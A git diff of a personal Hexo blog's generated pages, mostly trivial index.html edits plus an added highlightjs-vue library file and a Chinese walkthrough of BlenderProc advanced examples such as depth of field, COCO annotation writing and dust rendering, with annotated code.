  galleries/研究生/河北/保定-秋冬/index.html  index 1f9f44bdbc..52269428bf, @@ -526,6 +524,8 @@, caption 你们南方人的四季是不完整的。——阿杰 ("you southerners' four seasons are incomplete." - A-Jie)
  galleries/研究生/河北/定州/index.html  index 26b2a4fab8..5412312882, @@ -526,6 +524,8 @@, caption 九州咽喉地,神京扼要区 ("throat of the nine regions, strategic gate of the capital")
  galleries/研究生/河北/正定/index.html  index d21996cd7d..656e2dfa77, @@ -526,6 +524,8 @@, caption 吾乃石家庄赵子龙是也! ("I am Zhao Zilong of Shijiazhuang!")
  galleries/研究生/河北/石家庄/index.html index 888dd677b9..a1bd8fa9fc, @@ -526,6 +524,8 @@, caption 云层深处的黑暗啊 淹没心底的景观 ("darkness deep in the clouds, drowning the landscape in my heart")
  galleries/研究生/河北/雄安/index.html  index 1346f614d3..f6d4846b37, @@ -526,6 +524,8 @@, caption 冀 X ("Ji X", the Hebei licence-plate prefix)

diff --git a/galleries/研究生/福州/index.html b/galleries/研究生/福州/index.html
index 57e989565a..11d41d00ad 100644
--- a/galleries/研究生/福州/index.html
+++ b/galleries/研究生/福州/index.html
@@ -43,8 +43,6 @@
-
-
@@ -526,6 +524,8 @@

如果问我 在虎纠上哪潇洒 话不多说 带你了解

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/index.html b/index.html index 1806fd3315..725e3d9137 100644 --- a/index.html +++ b/index.html @@ -43,8 +43,6 @@ - - @@ -705,6 +703,8 @@

Web-Vue(Vue 核心)

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/js/highlightjs-vue/highlightjs-vue.js b/js/highlightjs-vue/highlightjs-vue.js new file mode 100644 index 0000000000..7755e977a0 --- /dev/null +++ b/js/highlightjs-vue/highlightjs-vue.js @@ -0,0 +1,8 @@ +/** + * Minified by jsDelivr using Terser v5.19.2. + * Original file: /npm/highlightjs-vue@1.0.0/dist/highlightjs-vue.cjs.js + * + * Do NOT use SRI with dynamically generated files! More information: https://www.jsdelivr.com/using-sri-with-dynamic-files + */ +"use strict";var module$1=module$1||{};function hljsDefineVue(e){return{subLanguage:"xml",contains:[e.COMMENT("\x3c!--","--\x3e",{relevance:10}),{begin:/^(\s*)( @@ -1167,6 +1165,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/10/index.html b/page/10/index.html index e35ec18871..735c837631 100644 --- a/page/10/index.html +++ b/page/10/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Web-ECharts 地图可视化

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/11/index.html b/page/11/index.html index c3c1c17c98..af1e26ce74 100644 --- a/page/11/index.html +++ b/page/11/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Hexo-Artitalk

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/12/index.html b/page/12/index.html index 7a5f8549cd..a10d087de7 100644 --- a/page/12/index.html +++ b/page/12/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Software-谌嘉诚 UE4 教程(52-56)

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/13/index.html b/page/13/index.html index 039e1172c5..0ee09520cc 100644 --- a/page/13/index.html +++ b/page/13/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Diary-寒假(福州篇)

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/14/index.html b/page/14/index.html index edb13e8560..cb9ce506a2 100644 --- a/page/14/index.html +++ b/page/14/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Diary-定州之旅

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/15/index.html b/page/15/index.html index 0265733148..0dcaa25a30 100644 --- a/page/15/index.html +++ b/page/15/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Paper-Fourier Contour Embedding for Arbitrary-Sh var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/16/index.html b/page/16/index.html index 21a462faa3..b33e18a13f 100644 --- a/page/16/index.html +++ b/page/16/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Software-AI

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/17/index.html b/page/17/index.html index d7f12d05d4..5b177ac1e5 100644 --- a/page/17/index.html +++ b/page/17/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Diary-5-更寒风与更雾霾

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/18/index.html b/page/18/index.html index 48a330e715..e07937cd8e 100644 --- a/page/18/index.html +++ b/page/18/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Software-Blender(粒子篇)

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/19/index.html b/page/19/index.html index 1cd3ca80cf..5d23813be2 100644 --- a/page/19/index.html +++ b/page/19/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Paper-Building outline extraction from ALS point var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/2/index.html b/page/2/index.html index faf17f137e..9ea67b2d28 100644 --- a/page/2/index.html +++ b/page/2/index.html @@ -43,8 +43,6 @@ - - @@ -711,6 +709,8 @@

Paper-桥边红药的论文

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/20/index.html b/page/20/index.html index 1121e77acc..568fa7db24 100644 --- a/page/20/index.html +++ b/page/20/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Paper-Training Deep Networks with Synthetic Data var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/21/index.html b/page/21/index.html index 3c358d8751..8092365771 100644 --- a/page/21/index.html +++ b/page/21/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Software-PS Beta 25.0

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/22/index.html b/page/22/index.html index c0f48713e3..fbd764a935 100644 --- a/page/22/index.html +++ b/page/22/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Paper-BlenderText-旧

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/23/index.html b/page/23/index.html index e2b966c063..d0194cdc15 100644 --- a/page/23/index.html +++ b/page/23/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Diary-鄂了(一)

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/24/index.html b/page/24/index.html index de9d7cb37d..adcb983fc0 100644 --- a/page/24/index.html +++ b/page/24/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Diary-最后的第 19 周

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/25/index.html b/page/25/index.html index 415e507607..eac58ae1fb 100644 --- a/page/25/index.html +++ b/page/25/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Diary-平淡的第 15 周和疯狂的第 16 周< var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/26/index.html b/page/26/index.html index 3477ec497d..a0534d174d 100644 --- a/page/26/index.html +++ b/page/26/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Diary-似乎很平淡的第 13 周和第 14 周< var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/27/index.html b/page/27/index.html index 89fe3807ff..3d0e239b96 100644 --- a/page/27/index.html +++ b/page/27/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

ML-李宏毅-機器如何生成圖像

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/28/index.html b/page/28/index.html index a2942e7ed6..9961227655 100644 --- a/page/28/index.html +++ b/page/28/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Paper-Rethinking Text Segmentation:A Novel Dat var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/29/index.html b/page/29/index.html index a56d82a268..12d71c0842 100644 --- a/page/29/index.html +++ b/page/29/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Paper-Synthetic Data for Text Localisation in Na var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/3/index.html b/page/3/index.html index 4d3252805a..9112b9835b 100644 --- a/page/3/index.html +++ b/page/3/index.html @@ -43,8 +43,6 @@ - - @@ -715,6 +713,8 @@

Diary-A Survey of Synthetic Data Augmentation Me var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/30/index.html b/page/30/index.html index 06017b4efb..85a3c50247 100644 --- a/page/30/index.html +++ b/page/30/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Pytorch-目标检测 YOLOv5 开源代码项目 var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/31/index.html b/page/31/index.html index e13171391b..cfad7d0e5d 100644 --- a/page/31/index.html +++ b/page/31/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Paper-整理下这段时间看的论文

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/32/index.html b/page/32/index.html index 6c9343fec6..713f221f79 100644 --- a/page/32/index.html +++ b/page/32/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

DL-深度学习进阶-自然语言处理-4-word2 var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/33/index.html b/page/33/index.html index 80323547a5..485446a617 100644 --- a/page/33/index.html +++ b/page/33/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

DL-深度学习入门-基于Python的理论与 var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/34/index.html b/page/34/index.html index e44883b575..7979b416a8 100644 --- a/page/34/index.html +++ b/page/34/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

ML-李宏毅-Lecture 4-Sequence as input

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/35/index.html b/page/35/index.html index 6fd0db44a1..45737b94d2 100644 --- a/page/35/index.html +++ b/page/35/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Paper-Handwritten Optical Character Recognition var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/36/index.html b/page/36/index.html index 62a374cf2c..c2da6b7777 100644 --- a/page/36/index.html +++ b/page/36/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

DIP-Convolutions in image processing

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/37/index.html b/page/37/index.html index f09db4d1d0..a30a7a33a5 100644 --- a/page/37/index.html +++ b/page/37/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Diary-闽了

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/38/index.html b/page/38/index.html index 6d44dd9fc7..c9d2aaa30a 100644 --- a/page/38/index.html +++ b/page/38/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

DIP-Introductory python tutorials for image proc var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/39/index.html b/page/39/index.html index 5af5c94e19..8b61bbbb80 100644 --- a/page/39/index.html +++ b/page/39/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Diary-冀之前的9月

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/4/index.html b/page/4/index.html index 7b7755cce6..c645b09a66 100644 --- a/page/4/index.html +++ b/page/4/index.html @@ -43,8 +43,6 @@ - - @@ -719,6 +717,8 @@

Course-文本识别 OCR 神器 MMOCR

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/40/index.html b/page/40/index.html index 52645ad033..3e0684711a 100644 --- a/page/40/index.html +++ b/page/40/index.html @@ -43,8 +43,6 @@ - - @@ -720,6 +718,8 @@

Linux-莫烦python学习笔记(linux)

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/41/index.html b/page/41/index.html index 6531c4e8e1..af6b78507e 100644 --- a/page/41/index.html +++ b/page/41/index.html @@ -43,8 +43,6 @@ - - @@ -716,6 +714,8 @@

Python-人工智能数学基础(7-9)

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/42/index.html b/page/42/index.html index 39f1bcff58..ca267a68a6 100644 --- a/page/42/index.html +++ b/page/42/index.html @@ -43,8 +43,6 @@ - - @@ -712,6 +710,8 @@

Diary-实习的第五周

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/43/index.html b/page/43/index.html index 11d16416dd..1f9913dea3 100644 --- a/page/43/index.html +++ b/page/43/index.html @@ -43,8 +43,6 @@ - - @@ -628,6 +626,8 @@

Hexo-第一篇博客

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/5/index.html b/page/5/index.html index bf8de97f51..f908a963b3 100644 --- a/page/5/index.html +++ b/page/5/index.html @@ -43,8 +43,6 @@ - - @@ -721,6 +719,8 @@

Diary-粤了(三)

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/6/index.html b/page/6/index.html index 2a5ca4bed2..b5174f37bb 100644 --- a/page/6/index.html +++ b/page/6/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Diary-保定市城市展示中心

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/7/index.html b/page/7/index.html index 88d2b4e11b..c0fae3a19b 100644 --- a/page/7/index.html +++ b/page/7/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Paper-Unsupervised Domain Adaptation by Backprop var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/8/index.html b/page/8/index.html index a8fdb6682b..84abd23e6e 100644 --- a/page/8/index.html +++ b/page/8/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

GAMES104-Rendering

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/page/9/index.html b/page/9/index.html index ea3708c699..edb54a79b5 100644 --- a/page/9/index.html +++ b/page/9/index.html @@ -43,8 +43,6 @@ - - @@ -723,6 +721,8 @@

Word-论文排版

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Blender-BlenderProc Examples overview-Advanced Examples/index.html b/posts/Blender-BlenderProc Examples overview-Advanced Examples/index.html index 08c45bf8c8..46719f04ab 100644 --- a/posts/Blender-BlenderProc Examples overview-Advanced Examples/index.html +++ b/posts/Blender-BlenderProc Examples overview-Advanced Examples/index.html @@ -44,8 +44,6 @@ - - @@ -406,7 +404,7 @@

Resources

Course

Auto shading

Usage

blenderproc run examples/advanced/auto_shading/main.py examples/advanced/auto_shading/camera_position examples/advanced/auto_shading/scene.blend examples/advanced/auto_shading/output

Visualization

blenderproc vis hdf5 examples/advanced/auto_shading/output/0.hdf5

png

Code

# Find the object with name "Sphere"
sphere = bproc.filter.one_by_attr(objs, "name", "Sphere")
# Set it to AUTO shading, so all angles greater than 45 degrees will be shaded flat.
sphere.set_shading_mode("auto", 45)

# Find the object with name "Sphere.001"
other_sphere = bproc.filter.one_by_attr(objs, "name", "Sphere.001")
# Set it to smooth shading, so all angles will be shaded smooth.
other_sphere.set_shading_mode("smooth")

Camera Depth of Field

Usage

blenderproc run examples/advanced/camera_depth_of_field/main.py examples/resources/scene.obj examples/advanced/camera_depth_of_field/output

Visualization

blenderproc vis hdf5 examples/advanced/camera_depth_of_field/output/0.hdf5

png

Code

Setting the focus point:

# Create an empty object which will represent the cameras focus point
focus_point = bproc.object.create_empty("Camera Focus Point")
focus_point.set_location([0.5, -1.5, 3])

# define the camera intrinsics
bproc.camera.set_resolution(512, 512)
# Set the empty object as focus point and set fstop to regulate the sharpness of the scene
bproc.camera.add_depth_of_field(focus_point, fstop_value=0.25)

First, bproc.camera.set_resolution(512, 512) sets the camera resolution to 512x512 pixels.

Next, bproc.camera.add_depth_of_field(focus_point, fstop_value=0.25) adds the depth-of-field effect. Here focus_point is the focal point of the depth of field, i.e. the object the camera focuses on (usually the center of the scene). The fstop_value parameter controls how shallow the depth of field is: the smaller the value, the more pronounced the effect. In this example fstop_value is set to 0.25, so the rendered scene shows fairly strong depth-of-field blur.
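To see the parameter's effect, one could raise the value; a minimal sketch (2.8 is just an illustrative aperture, not from the example):

# A larger fstop_value gives a deeper depth of field, i.e. weaker blur
bproc.camera.add_depth_of_field(focus_point, fstop_value=2.8)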

COCO annotations

Usage

blenderproc run examples/advanced/coco_annotations/main.py examples/resources/camera_positions examples/advanced/coco_annotations/scene.blend examples/advanced/coco_annotations/output

Visualization

An example command for visualizing COCO-format annotations with blenderproc:

blenderproc vis coco [-i <image index>] [-c <coco annotations json>] [-b <base folder of coco json and image files>]

The files generated in COCO dataset form:

png

What's inside coco_annotations.json (honestly it looks like a jumble of stuff):

{
  "info": {
    "description": "coco_annotations",
    "url": "https://github.com/waspinator/pycococreator",
    "version": "0.1.0",
    "year": 2020,
    "contributor": "Unknown",
    "date_created": "2023-06-04 23:59:39.563796"
  },
  "licenses": [
    {
      "id": 1,
      "name": "Attribution-NonCommercial-ShareAlike License",
      "url": "http://creativecommons.org/licenses/by-nc-sa/2.0/"
    }
  ],
  "categories": [
    {
      "id": 1,
      "supercategory": "coco_annotations",
      "name": "Suzanne"
    },

    ...

    {
      "id": 9,
      "supercategory": "coco_annotations",
      "name": "Cube.001"
    }
  ],
  "images": [
    {
      "id": 0,
      "file_name": "images/000000.jpg",
      "width": 512,
      "height": 512,
      "date_captured": "2023-06-04 23:59:39.563796",
      "license": 1,
      "coco_url": "",
      "flickr_url": ""
    },
    {
      "id": 1,
      "file_name": "images/000001.jpg",
      "width": 512,
      "height": 512,
      "date_captured": "2023-06-04 23:59:39.672089",
      "license": 1,
      "coco_url": "",
      "flickr_url": ""
    }
  ],
  "annotations": [
    {
      "id": 1,
      "image_id": 0,
      "category_id": 1,
      "iscrowd": 0,
      "area": 8330,
      "bbox": [184, 98, 144, 114],
      "segmentation": {
        "counts": [94341, ... 94583],
        "size": [512, 512]
      },
      "width": 512,
      "height": 512
    },

    ...

    {
      "id": 16,
      "image_id": 1,
      "category_id": 9,
      "iscrowd": 0,
      "area": 25473,
      "bbox": [0, 456, 512, 56],
      "segmentation": {
        "counts": [460, ... 34],
        "size": [512, 512]
      },
      "width": 512,
      "height": 512
    }
  ]
}

In this example:

blenderproc vis coco -i 1 -c coco_annotations.json -b examples/advanced/coco_annotations/output/coco_data

Then you'll be treated to an error:

AttributeError: module 'numpy' has no attribute 'bool'.
`np.bool` was a deprecated alias for the builtin `bool`. To avoid this error in existing code, use `bool` by itself. Doing this will not modify any behavior and is safe. If you specifically wanted the numpy scalar type, use `np.bool_` here.
The aliases was originally deprecated in NumPy 1.20; for more details and guidance see the original release note at:
https://numpy.org/devdocs/release/1.20.0-notes.html#deprecations. Did you mean: 'bool_'?

In vis_coco_annotation.py, find the line that uses np.bool and change it to np.bool_ (or the builtin bool), as the error message suggests.
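The change is a one-liner; a sketch of the idea (the exact line in vis_coco_annotation.py may differ, this segmap is only illustrative):

import numpy as np

segmap = np.zeros((4, 4))
# before: segmap.astype(np.bool) raises AttributeError on NumPy >= 1.24
# after: use np.bool_ (or the builtin bool) instead
mask = segmap.astype(np.bool_)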

png

Run it again!

png

Code

# Set some category ids for loaded objects
for j, obj in enumerate(objs):
    obj.set_cp("category_id", j + 1)

To create COCO annotations, we need to render instance and category maps. Categories are defined by the custom property "category_id", which must be set in advance for every instance. The category_id can be set via a custom property as above, in the loader, or directly in the .blend file. We also add "name" to the mapping so that the COCO annotation writer can later label the categories with the objects' names.


bproc.renderer.enable_segmentation_output(map_by=["category_id", "instance", "name"])

Calling bproc.renderer.enable_segmentation_output(map_by=["category_id", "instance", "name"]) activates segmentation rendering.

Here "category_id", "instance" and "name" denote three different labeling schemes: by category, by object instance and by name.

The function labels every object in the scene according to the selected schemes and stores the labels in the render output. For example, with "category_id" each object is assigned a unique integer ID representing the category it belongs to.
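For orientation, these calls fit into the usual BlenderProc flow roughly like this (a minimal sketch; the key names follow the data["..."] accesses used below):

# Assumed pipeline order: enable the output, render, then pass the results on
bproc.renderer.enable_segmentation_output(map_by=["category_id", "instance", "name"])
data = bproc.renderer.render()  # dict with "colors", "instance_segmaps", "instance_attribute_maps"
# the dict entries are then handed to the COCO writer (next code block)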


# Write data to coco file
bproc.writer.write_coco_annotations(os.path.join(args.output_dir, 'coco_data'),
                                    instance_segmaps=data["instance_segmaps"],
                                    instance_attribute_maps=data["instance_attribute_maps"],
                                    colors=data["colors"],
                                    color_file_format="JPEG")

bproc.writer.write_coco_annotations() generates the COCO dataset.

This function stores the annotations in coco_annotations.json. Optionally, you can set "supercategory": "<some_supercategory>" in the writer.CocoAnnotationsWriter config to filter objects by the previously assigned custom property "supercategory".
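A hedged sketch of that option (the supercategory value here is illustrative, not from the example):

bproc.writer.write_coco_annotations(os.path.join(args.output_dir, 'coco_data'),
                                    instance_segmaps=data["instance_segmaps"],
                                    instance_attribute_maps=data["instance_attribute_maps"],
                                    colors=data["colors"],
                                    supercategory="my_supercategory")  # hypothetical value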


Code


bproc.writer.write_coco_annotations()

def write_coco_annotations(output_dir: str, instance_segmaps: Optional[List[np.ndarray]] = None,
                           instance_attribute_maps: Optional[List[dict]] = None,
                           colors: Optional[List[np.ndarray]] = None, color_file_format: str = "PNG",
                           mask_encoding_format: str = "rle", supercategory: str = "coco_annotations",
                           append_to_existing_output: bool = True, segmap_output_key: str = "segmap",
                           segcolormap_output_key: str = "segcolormap", rgb_output_key: str = "colors",
                           jpg_quality: int = 95, label_mapping: Optional[LabelIdMapping] = None,
                           file_prefix: str = "", indent: Optional[Union[int, str]] = None):

This function writes the COCO annotations in the following steps:

  1. Locate the segmentation images
  2. …

    Code

  3. indent: if indent is a non-negative integer or string, the annotation output is pretty-printed at that indent level. An indent level of 0, a negative number, or "" inserts only newlines; None (the default) selects the most compact representation. A positive integer indents each level by that many spaces; if indent is a string (such as "\t"), that string is used to indent each level.
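These indent semantics are simply those of json.dump, which the writer calls at the very end (see the last code block below); a quick illustration:

import json

payload = {"id": 1, "bbox": [184, 98, 144, 114]}
print(json.dumps(payload, indent=None))  # most compact, single line
print(json.dumps(payload, indent=2))     # pretty-printed, 2 spaces per level
print(json.dumps(payload, indent="\t"))  # tab-indented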

# Type-check the three optional arguments and normalize them to lists; None becomes an empty list
instance_segmaps = [] if instance_segmaps is None else list(instance_segmaps)
colors = [] if colors is None else list(colors)
# (why does the code style here differ from the lines above?)
if instance_attribute_maps is None:
    instance_attribute_maps = []

# If colors[0] is a four-dimensional array, raise a ValueError: BlenderProc currently cannot
# write coco annotations for stereo images, only separate left/right images and segmaps
if len(colors) > 0 and len(colors[0].shape) == 4:
    raise ValueError("BlenderProc currently does not support writing coco annotations for stereo images. "
                     "However, you can enter left and right images / segmaps separately.")

# Create output directory
# The 'images' subfolder stores the converted images; if it already exists, nothing is created
os.makedirs(os.path.join(output_dir, 'images'), exist_ok=True)

# These blocks locate the paths of the RGB images, instance segmentation images and
# attribute mapping files produced during rendering
if not instance_segmaps:
    # If instance_segmaps is empty, look up the path of the instance segmentation images
    # via Utility.find_registered_output_by_key()
    # Find path pattern of segmentation images
    segmentation_map_output = Utility.find_registered_output_by_key(segmap_output_key)
    if segmentation_map_output is None:
        # No output registered under segmap_output_key: the user has to run the SegMapRenderer
        # module before calling write_coco_annotations()
        raise RuntimeError(f"There is no output registered with key {segmap_output_key}. Are you sure you "
                           f"ran the SegMapRenderer module before?")

if not colors:
    # Find path pattern of rgb images
    # If colors is empty, look up the path of the RGB images
    rgb_output = Utility.find_registered_output_by_key(rgb_output_key)
    if rgb_output is None:
        # No output registered under rgb_output_key: the user has to run the RgbRenderer module first
        raise RuntimeError(f"There is no output registered with key {rgb_output_key}. Are you sure you "
                           f"ran the RgbRenderer module before?")

if not instance_attribute_maps:
    # Find path of name class mapping csv file
    # If instance_attribute_maps is empty, look up the file that maps instance segmaps
    # to object names and class labels
    segcolormap_output = Utility.find_registered_output_by_key(segcolormap_output_key)
    if segcolormap_output is None:
        # No output registered under segcolormap_output_key: the user has to run the SegMapRenderer
        # module with 'map_by' set to 'instance' first
        raise RuntimeError(f"There is no output registered with key {segcolormap_output_key}. Are you sure you "
                           f"ran the SegMapRenderer module with 'map_by' set to 'instance' before?")

# Determine the path of the output COCO annotation file and, when appending to existing
# output, compute the image numbering offset
coco_annotations_path = os.path.join(output_dir, "coco_annotations.json")
# Calculate image numbering offset, if append_to_existing_output is activated and coco data exists
if append_to_existing_output and os.path.exists(coco_annotations_path):
    # If append_to_existing_output is True and a 'coco_annotations.json' already exists, load it into memory
    with open(coco_annotations_path, 'r', encoding="utf-8") as fp:
        existing_coco_annotations = json.load(fp)
    # Use the maximum existing image id plus 1 as the numbering offset, so newly generated
    # annotations never collide with the existing annotation file
    image_offset = max(image["id"] for image in existing_coco_annotations["images"]) + 1
else:
    # If append_to_existing_output is False or no existing annotation file is found,
    # the offset is 0 and existing_coco_annotations is set to None
    image_offset = 0
    existing_coco_annotations = None

# collect all RGB paths
new_coco_image_paths = []
# collect all mappings from csv (backwards compat)
segcolormaps = []
# collect all instance segmaps (backwards compat)
inst_segmaps = []

# for each rendered frame
# Iterate over every frame from bpy.context.scene.frame_start to bpy.context.scene.frame_end
for frame in range(bpy.context.scene.frame_start, bpy.context.scene.frame_end):

    # If instance_attribute_maps is empty, read the mapping file (segcolormap_output) to get the
    # object name/class to integer mapping and store it in the segcolormaps list
    if not instance_attribute_maps:
        # read colormappings, which include object name/class to integer mapping
        segcolormap = []
        with open(segcolormap_output["path"] % frame, 'r', encoding="utf-8") as csvfile:
            reader = csv.DictReader(csvfile)
            for mapping in reader:
                segcolormap.append(mapping)
        segcolormaps.append(segcolormap)

    # If instance_segmaps is empty, load the segmentation image file (segmentation_map_output),
    # extract the instance channel (channel_instance) and store the instance segmap in inst_segmaps
    if not instance_segmaps:
        # Load segmaps (backwards compat)
        segmap = np.load(segmentation_map_output["path"] % frame)
        inst_channel = int(segcolormap[0]['channel_instance'])
        inst_segmaps.append(segmap[:, :, inst_channel])

    # If colors is non-empty, write the RGB (color) render to the target path with OpenCV's
    # imwrite(); the path is derived from file_prefix and the image offset
    if colors:
        color_rgb = colors[frame - bpy.context.scene.frame_start]

        # Reverse channel order for opencv
        color_bgr = color_rgb.copy()
        color_bgr[..., :3] = color_bgr[..., :3][..., ::-1]

        if color_file_format == 'PNG':
            target_base_path = f'images/{file_prefix}{frame + image_offset:06d}.png'
            target_path = os.path.join(output_dir, target_base_path)
            cv2.imwrite(target_path, color_bgr)
        elif color_file_format == 'JPEG':
            target_base_path = f'images/{file_prefix}{frame + image_offset:06d}.jpg'
            target_path = os.path.join(output_dir, target_base_path)
            cv2.imwrite(target_path, color_bgr, [int(cv2.IMWRITE_JPEG_QUALITY), jpg_quality])
        else:
            raise RuntimeError(f'Unknown color_file_format={color_file_format}. Try "PNG" or "JPEG"')

    else:
        # If no explicit color array was passed, copy the rendered RGB image directly to the target path
        source_path = rgb_output["path"] % frame
        target_base_path = os.path.join('images',
                                        file_prefix + os.path.basename(rgb_output["path"] % (frame + image_offset)))
        target_path = os.path.join(output_dir, target_base_path)
        shutil.copyfile(source_path, target_path)

    # Append the relative target path to new_coco_image_paths; this list is used in the COCO annotations
    new_coco_image_paths.append(target_base_path)

instance_attribute_maps = segcolormaps if segcolormaps else instance_attribute_maps
instance_segmaps = inst_segmaps if inst_segmaps else instance_segmaps

coco_output = _CocoWriterUtility.generate_coco_annotations(instance_segmaps,
                                                           instance_attribute_maps,
                                                           new_coco_image_paths,
                                                           supercategory,
                                                           mask_encoding_format,
                                                           existing_coco_annotations,
                                                           label_mapping)

print("Writing coco annotations to " + coco_annotations_path)
with open(coco_annotations_path, 'w', encoding="utf-8") as fp:
    json.dump(coco_output, fp, indent=indent)

This code passes the collected instance segmentation images, attribute mapping files, image paths and other parameters to _CocoWriterUtility.generate_coco_annotations() to produce COCO-format annotations. If old COCO annotations exist (i.e. existing_coco_annotations), they are merged into the generated ones.

Finally, the annotations are written to the given coco_annotations_path, and the file path is printed to the console.
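As a quick sanity check one can load the written file back (the path is assumed from the run command above):

import json

with open("examples/advanced/coco_annotations/output/coco_data/coco_annotations.json", encoding="utf-8") as fp:
    coco = json.load(fp)
print(len(coco["images"]), "images,", len(coco["annotations"]), "annotations")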

    Diffuse color image

    Usage

blenderproc run examples/advanced/diffuse_color_image/main.py examples/resources/scene.obj examples/advanced/diffuse_color_image/output
    • examples/advanced/diffuse_color_image/main.py: path to the main python file to run.
    • examples/resources/scene.obj: path to the object file with the basic scene.
    • examples/advanced/diffuse_color_image/output: path to the output directory.

    Visualization

blenderproc vis hdf5 examples/advanced/diffuse_color_image/output/0.hdf5

    png

    Code

# Also enable the diffuse color image, which describes the base color of the textures
bproc.renderer.enable_diffuse_color_output()

    How to apply dust to objects

    Usage

blenderproc run examples/advanced/dust/main.py resources/haven/models/ArmChair_01/ArmChair_01_2k.blend resources/haven examples/datasets/haven/output
    • examples/advanced/dust/main.py: path to the main python file to run.
• resources/haven/models/ArmChair_01/ArmChair_01.blend: path to the blend file from the haven dataset; browse the model folder for all possible options
• …

      png

      png

With the paths set up, off we go!

blenderproc run examples/advanced/dust/main.py resources/haven/models/GreenChair_01_4k.blend D:\Study\1st-year-master\Code\BlenderProc-main\resources\haven  examples/datasets/haven/output

Then it dies. No idea why glob.glob returns an empty list here; after rewriting that bit, this smelly mess of code finally runs.
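The rewrite itself isn't shown; one plausible workaround (an assumption, not the author's actual fix) is to enumerate the HDRIs with pathlib, since glob.glob can come up empty when forward and backward slashes are mixed on Windows:

from pathlib import Path

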